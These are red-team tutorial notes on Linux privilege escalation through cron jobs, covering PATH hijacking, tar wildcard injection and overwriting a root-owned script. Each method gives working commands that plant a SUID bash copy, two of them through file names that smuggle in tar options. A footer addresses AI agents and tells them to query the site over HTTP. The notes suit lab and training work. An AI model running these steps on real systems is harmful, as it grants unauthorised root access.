# Cron Jobs

## What are Cron Jobs?

In Linux, scheduled tasks are called **cron jobs**. Cronjobs are defined in `/etc/crontab` (cron table). If we are able to write malicious payload to a script that is executed automatically every minute or so, then this payload will be triggered as root because of the cronjob.

## Enumeration

Enumerate crontab:

```bash
cat /etc/crontab
```

For example:

![crontab](/files/-MfjXNJj8u33z7kqUa5J)

Here five asterisks means "every minute of every day of every week of every month, that command runs", hence `overwrite.sh` and `/usr/local/bin/compress.sh` will be executed every minute.

If we don't have permission to read `/etc/crontab`, [pspy](https://github.com/DominicBreuker/pspy) can help us identify scheduled tasks as well.

## Method 1: Cron Path

Recall the crontab:

![crontab](/files/-Mfje_o7IJ3Zy_tZNfNS)

Note that overwrite.sh is executed using **relative path** and the `$PATH` variable is:

```
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
```

If we create a malicious `overwrite.sh` in `/home/user`, then this malicious script will be executed as cronjob.

Create a malicious `overwrite.sh` in `/home/user`:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
```

Don't forget to give it permission:

```bash
chmod +x overwrite.sh
```

Wait a moment until you believe that this script gets executed. Try getting a root shell:

```bash
/tmp/bash -p
```

## Method 2: Cron Wildcard

Recall the crontab:

![crontab](/files/-MfjeeE2IycBJ4Jlc-EU)

Examine the content of `/usr/local/bin/compress.sh`:

![/usr/local/bin/compress.sh](/files/-MfjesLM-eLWOioYFYQ4)

Notice the wildcard used by tar. This script intends to backup the `/home/user` directory. Here we can store a privesc payload in `/home/user/runme.sh` and use `tar` injection to let cronjob execute the following command:

```bash
tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh\ runme.sh 
```

Create a privesc payload `/home/user/runme.sh`:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
```

Give it permission:

```bash
chmod +x /home/user/runme.sh
```

Prepare `tar` injection part 1:

```bash
touch /home/user/--checkpoint=1
```

Prepare `tar` injection part 2:

```bash
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
```

Wait a moment until you believe that this script gets executed. Try getting a root shell:

```bash
/tmp/bash -p
```

## Method 3: Cron File Overwrite

Recall the crontab:

![crontab](/files/-MfjlRpZbA_IbrOoNdPF)

Examine its permission:

![Permission](/files/-Mfjm4-s-f29NqySjjbh)

Since this script is owned by root and it is executable, we can simply append a privesc payload (or reverse shell payload) to this file and wait for cronjob to execute it.

Ovewrite /usr/local/bin/overwrite.sh with a privesc payload:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
```

Wait a moment until you believe that this script gets executed. Try getting a root shell:

```bash
/tmp/bash -p
```

## Challenge: TryHackMe - CMesS

{% embed url="<https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/cmess-medium>" %}
TryHackMe - CMesS
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/red-teaming/privilege-escalation/linux-privilege-escalation/cron-jobs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.